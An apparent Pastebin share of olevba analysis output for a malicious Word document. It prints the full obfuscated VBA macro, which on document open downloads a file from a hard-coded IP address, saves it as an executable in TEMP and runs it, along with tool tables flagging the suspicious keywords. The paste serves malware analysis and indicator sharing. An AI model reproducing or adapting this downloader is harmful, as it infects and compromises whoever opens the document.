dynamoo

Malicious Word macro

Apr 1st, 2015
368
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- 09.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 09.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 09.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. M74TMHsK391U17
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module1.bas
  27. in file: 09.doc - OLE stream: u'Macros/VBA/Module1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Function RaSfP6r1363354I(ByVal PzRG5z7lX09IgN5jL2 As String, ByVal PF5ZVO1vjpV4jr0SV9QERY3q3 As String) As Boolean
  31. Dim sSt9btW4T0Q9CRYn As Object, PJZVvQ3ZZA As Long, JJ11x8 As Long, PN10dD65K61UuEYF53() As Byte
  32. Set sSt9btW4T0Q9CRYn = CreateObject(ChrW(38.5 + 38.5) & ChrW(41.5 + 41.5) & ChrW(44 + 44) & ChrW(38.5 + 38.5) & ChrW(38 + 38) & ChrW(25 + 25) & ChrW(23 + 23) & ChrW(44 + 44) & ChrW(38.5 + 38.5) & ChrW(38 + 38) & ChrW(36 + 36) & ChrW(42 + 42) & ChrW(42 + 42) & ChrW(40 + 40))
  33. sSt9btW4T0Q9CRYn.Open ChrW(35.5 + 35.5) & ChrW(34.5 + 34.5) & ChrW(42 + 42), PzRG5z7lX09IgN5jL2, False
  34. sSt9btW4T0Q9CRYn.Send "e"
  35. PN10dD65K61UuEYF53 _
  36.  = sSt9btW4T0Q9CRYn.responseBody
  37. JJ11x8 = FreeFile
  38. Open _
  39.  PF5ZVO1vjpV4jr0SV9QERY3q3 For _
  40.  Binary Access _
  41.  Write Lock Write As #JJ11x8
  42. Put #JJ11x8, , PN10dD65K61UuEYF53
  43. Close #JJ11x8
  44. Set GFCUTFUf87TGUbjdfgfdg = CreateObject(ChrW(41.5 + 41.5) & ChrW(52 + 52) & ChrW(50.5 + 50.5) & ChrW(54 + 54) & ChrW(54 + 54) & ChrW(23 + 23) & ChrW(32.5 + 32.5) & ChrW(56 + 56) & ChrW(56 + 56) & ChrW(54 + 54) & ChrW(52.5 + 52.5) & ChrW(49.5 + 49.5) & ChrW(48.5 + 48.5) & ChrW(58 + 58) & ChrW(52.5 + 52.5) & ChrW(55.5 + 55.5) & ChrW(55 + 55))
  45. GFCUTFUf87TGUbjdfgfdg.Open _
  46.  Environ(ChrW(42 + 42) & ChrW(34.5 + 34.5) & ChrW(38.5 + 38.5) & ChrW(40 + 40)) & ChrW(46 + 46) & ChrW(34 + 34) & ChrW(39.5 + 39.5) & ChrW(43.5 + 43.5) & ChrW(42.5 + 42.5) & ChrW(36.5 + 36.5) & ChrW(32.5 + 32.5) & ChrW(32.5 + 32.5) & ChrW(35 + 35) & ChrW(40.5 + 40.5) & ChrW(42 + 42) & ChrW(32.5 + 32.5) & ChrW(23 + 23) & ChrW(50.5 + 50.5) & ChrW(60 + 60) & ChrW(50.5 + 50.5)
  47. End Function
  48.  
  49. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  50. ANALYSIS:
  51. +------------+--------------+-----------------------------------------+
  52. | Type       | Keyword      | Description                             |
  53. +------------+--------------+-----------------------------------------+
  54. | Suspicious | CreateObject | May create an OLE object                |
  55. | Suspicious | Open         | May open a file                         |
  56. | Suspicious | Environ      | May read system environment variables   |
  57. | Suspicious | Write        | May write to a file (if combined with   |
  58. |            |              | Open)                                   |
  59. | Suspicious | Put          | May write to a file (if combined with   |
  60. |            |              | Open)                                   |
  61. | Suspicious | ChrW         | May attempt to obfuscate specific       |
  62. |            |              | strings                                 |
  63. | Suspicious | Binary       | May read or write a binary file (if     |
  64. |            |              | combined with Open)                     |
  65. +------------+--------------+-----------------------------------------+
  66. -------------------------------------------------------------------------------
  67. VBA MACRO Module2.bas
  68. in file: 09.doc - OLE stream: u'Macros/VBA/Module2'
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70.  
  71. Sub M74TMHsK391U17()
  72. RaSfP6r1363354I ChrW(52 + 52) & ChrW(58 + 58) & ChrW(58 + 58) & ChrW(56 + 56) & ChrW(29 + 29) & ChrW(23.5 + 23.5) & ChrW(23.5 + 23.5) & ChrW(28.5 + 28.5) & ChrW(24.5 + 24.5) & ChrW(23 + 23) & ChrW(25 + 25) & ChrW(26 + 26) & ChrW(25 + 25) & ChrW(23 + 23) & ChrW(24.5 + 24.5) & ChrW(27 + 27) & ChrW(25.5 + 25.5) & ChrW(23 + 23) & ChrW(27.5 + 27.5) & ChrW(28 + 28) & ChrW(23.5 + 23.5) & ChrW(57.5 + 57.5) & ChrW(56.5 + 56.5) & ChrW(59.5 + 59.5) & ChrW(50.5 + 50.5) & ChrW(57 + 57) & ChrW(50.5 + 50.5) & ChrW(23.5 + 23.5) & ChrW(49.5 + 49.5) & ChrW(48.5 + 48.5) & ChrW(57.5 + 57.5) & ChrW(54.5 + 54.5) & ChrW(48.5 + 48.5) & ChrW(23 + 23) & ChrW(51.5 + 51.5) & ChrW(52.5 + 52.5) & ChrW(51 + 51), _
  73.  Environ(ChrW(42 + 42) & ChrW(34.5 + 34.5) & ChrW(38.5 + 38.5) & ChrW(40 + 40)) & ChrW(46 + 46) & ChrW(34 + 34) & ChrW(39.5 + 39.5) & ChrW(43.5 + 43.5) & ChrW(42.5 + 42.5) & ChrW(36.5 + 36.5) & ChrW(32.5 + 32.5) & ChrW(32.5 + 32.5) & ChrW(35 + 35) & ChrW(40.5 + 40.5) & ChrW(42 + 42) & ChrW(32.5 + 32.5) & ChrW(23 + 23) & ChrW(50.5 + 50.5) & ChrW(60 + 60) & ChrW(50.5 + 50.5)
  74. End Sub
  75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  76. ANALYSIS:
  77. +------------+---------+-----------------------------------------+
  78. | Type       | Keyword | Description                             |
  79. +------------+---------+-----------------------------------------+
  80. | Suspicious | Environ | May read system environment variables   |
  81. | Suspicious | ChrW    | May attempt to obfuscate specific       |
  82. |            |         | strings                                 |
  83. +------------+---------+-----------------------------------------+
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×